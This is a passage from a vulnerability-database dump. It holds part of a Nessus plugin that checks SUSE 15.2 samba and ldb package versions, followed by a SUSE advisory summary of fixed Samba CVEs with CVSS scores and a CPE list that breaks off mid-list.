rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-python3-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"python3-ldb-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"python3-ldb-debuginfo-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"python3-ldb-devel-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-core-devel-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debugsource-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libldb2-32bit-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libldb2-32bit-debuginfo-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"python3-ldb-32bit-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"python3-ldb-32bit-debuginfo-2.0.12-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldb-debugsource / ldb-tools / ldb-tools-debuginfo / libldb-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-14T06:29:10", "description": "This update for ldb, samba fixes the following issues :\n\nChanges in samba: Update to samba 4.11.11\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159]\n\n + CVE-2020-10745: invalid DNS or NBT queries containing\n dots use several seconds of CPU each; (bso#14378);\n (bsc#1173160).\n\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog\n LDAP server with paged_result or VLV; (bso#14402);\n (bsc#1173161)\n\n + CVE-2020-14303: Endless loop from empty UDP packet sent\n to AD DC nbt_server; (bso#14417); (bsc#1173359).\n\nUpdate to samba 4.11.10\n\n + Fix segfault when using SMBC_opendir_ctx() routine for\n share folder that contains incorrect symbols in any file\n name; (bso#14374).\n\n + vfs_shadow_copy2 doesn't fail case looking in\n snapdirseverywhere mode; (bso#14350)\n\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n\n + winbindd: Fix a use-after-free when winbind clients\n exit; (bso#14382)\n\n + ldb: Bump version to 2.0.11, LMDB databases can grow\n without bounds. (bso#14330)\n\nUpdate to samba 4.11.9\n\n + nmblib: Avoid undefined behaviour in handle_name_ptrs();\n (bso#14242).\n\n + 'samba-tool group' commands do not handle group names\n with special chars correctly; (bso#14296).\n\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo\n is not valid; (bso#14237).\n\n + Missing check for DMAPI offline status in async DOS\n attributes; (bso#14293).\n\n + smbd: Ignore set NTACL requests which contain S-1-5-88\n NFS ACEs; (bso#14307).\n\n + vfs_recycle: Prevent flooding the log if we're called on\n non-existant paths; (bso#14316)\n\n + smbd mistakenly updates a file's write-time on close;\n (bso#14320).\n\n + RPC handles cannot be differentiated in source3 RPC\n server; (bso#14359).\n\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW;\n (bso#14313).\n\n + nsswitch: Fix use-after-free causing segfault in\n _pam_delete_cred; (bso#14327).\n\n + Fix fruit:time machine max size on arm; (bso#13622)\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294).\n\n + ctdb: Fix a memleak; (bso#14348).\n\n + libsmb: Don't try to find posix stat info in\n SMBC_getatr().\n\n + ctdb-tcp: Move free of inbound queue to TCP restart;\n (bso#14295); (bsc#1162680).\n\n + s3/librpc/crypto: Fix double free with unresolved\n credential cache; (bso#14344); (bsc#1169095)\n\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294)\n\n + Starting ctdb node that was powered off hard before\n results in recovery loop; (bso#14295); (bsc#1162680).\n\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap;\n (bso#14324)\n\nUpdate to samba 4.11.8\n\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP\n Server with ASQ; (bso#14331); (bsc#1169850);\n\n + CVE-2020-10704: LDAP Denial of Service (stack overflow)\n in Samba AD DC; (bso#14334); (bsc#1169851);\n\nUpdate to samba 4.11.7\n\n + s3: lib: nmblib. Clean up and harden nmb packet\n processing; (bso#14239).\n\n + s3: VFS: full_audit. Use system session_info if called\n from a temporary share definition; (bso#14283)\n\n + dsdb: Correctly handle memory in objectclass_attrs;\n (bso#14258).\n\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect\n results for SCOPE_ONE searches; (bso#14270)\n\n + auth: Fix CIDs 1458418 and 1458420 NULL pointer\n dereferences; (bso#14247).\n\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n\n + winbind member (source3) fails local SAM auth with empty\n domain name; (bso#14247)\n\n + winbindd: Handling missing idmap in getgrgid();\n (bso#14265).\n\n + lib:util: Log mkdir error on correct debug levels;\n (bso#14253).\n\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in\n Python 3.9; (bso#14266).\n\n + ctdb-tcp: Make error handling for outbound connection\n consistent; (bso#14274).\n\nUpdate to samba 4.11.6\n\n + pygpo: Use correct method flags; (bso#14209).\n\n + vfs_ceph_snapshots: Fix root relative path handling;\n (bso#14216); (bsc#1141320).\n\n + Avoiding bad call flags with python 3.8, using\n METH_NOARGS instead of zero; (bso#14209).\n\n + source4/utils/oLschema2ldif: Include stdint.h before\n cmocka.h; (bso#14218).\n\n + docs-xml/winbindnssinfo: Clarify interaction with\n idmap_ad etc; (bso#14122).\n\n + smbd: Fix the build with clang; (bso#14251).\n\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n\n + s3: VFS: glusterfs: Reset nlinks for symlink entries\n during readdir; (bso#14182).\n\n + smbc_stat() doesn't return the correct st_mode and also\n the uid/gid is not filled (SMBv1) file; (bso#14101).\n\n + librpc: Fix string length checking in\n ndr_pull_charset_to_null(); (bso#14219).\n\n + ctdb-scripts: Strip square brackets when gathering\n connection info; (bso#14227).\n\nAdd libnetapi-devel to baselibs conf, for wine usage; (bsc#1172307);\n\nInstalling: samba - samba-ad-dc.service does not exist and unit not\nfound; (bsc#1171437);\n\nFix samba_winbind package is installing python3-base without python3\npackage; (bsc#1169521);\n\nChanges in ldb: Update to version 2.0.12\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159).\n\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + lib/ldb: add unit test for ldb_ldap internal code.\n\nUpdate to version 2.0.11\n\n + lib ldb: lmdb init var before calling mdb_reader_check.\n\n + lib ldb: lmdb clear stale readers on write txn start;\n (bso#14330).\n\n + ldb tests: Confirm lmdb free list handling\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-07-20T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : ldb, samba (SUSE-SU-2020:1948-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10700", "CVE-2020-10730", "CVE-2020-10760", "CVE-2020-14303", "CVE-2020-10704", "CVE-2020-10745"], "modified": "2020-07-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:libsamba-credentials-devel", "p-cpe:/a:novell:suse_linux:libldb-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-ceph", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:ldb-tools", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util-devel", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb-devel", "p-cpe:/a:novell:suse_linux:samba-python3", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libldb2-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libndr-devel", "p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:python3-ldb-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt-devel", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:python3-ldb-debuginfo", "p-cpe:/a:novell:suse_linux:samba-core-devel", "p-cpe:/a:novell:suse_linux:ldb-debugsource", "p-cpe:/a:novell:suse_linux:libsamdb-devel", "p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libldb2", "p-cpe:/a:novell:suse_linux:libdcerpc-devel", 